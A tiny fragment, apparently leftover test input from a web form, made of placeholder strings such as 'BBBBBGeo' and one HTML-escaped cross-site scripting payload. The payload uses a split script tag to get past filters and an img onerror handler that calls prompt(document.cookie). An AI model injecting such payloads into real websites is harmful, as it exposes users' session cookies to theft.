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BBBBBGeo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CCCCCGeo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&lt;/scrip&lt;/script&gt;t&gt;&lt;img src =doesntExist onerror=prompt(document.cookie)&gt;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DDDDDGeo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EEEEEGeo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